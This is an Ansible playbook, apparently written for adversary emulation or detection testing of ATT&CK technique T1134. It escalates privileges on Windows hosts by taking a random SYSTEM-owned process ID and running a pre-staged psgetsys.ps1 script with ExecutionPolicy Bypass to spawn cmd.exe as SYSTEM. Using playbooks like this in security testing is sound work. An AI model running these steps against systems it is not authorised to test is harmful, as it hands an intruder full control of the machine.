# attack_technique: T1134
# Reference: https://github.com/decoder-it/psgetsystem
- name: T1134 - Access Token Manipulation
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: Get running random PID running as system
      tags: always
      win_shell: |
        Get-WMIObject -Query "Select ProcessId From Win32_Service WHERE state='Running' and StartName='LocalSystem'" | findstr ProcessId | %{$_.split(':')[1]} | Sort-Object -Unique | Get-Random
      register: systemPID  
    - set_fact:
        tags: always
        pid={{systemPID.stdout}}
      
    - name: Execute elevation powershell script
      tags: always
      win_shell: |
        powershell.exe -ExecutionPolicy Bypass -Command c:\temp\psgetsys.ps1
    - name: Inject and check if running as system
      tags: always
      win_shell: |
        echo '[MyProcess]::CreateProcessFromParent({{pid}} ,"cmd.exe")' > c:\temp\priv-temp.ps1
    - name: Remove carriage return from file
      tags: always
      win_shell: |
        (Get-Content c:\temp\priv-temp.ps1) -join ' ' > c:\temp\priv.ps1
    - name: Execute ps script
      tags: always
      win_shell: |
        powershell.exe -ExecutionPolicy Bypass -Command c:\temp\priv.ps1
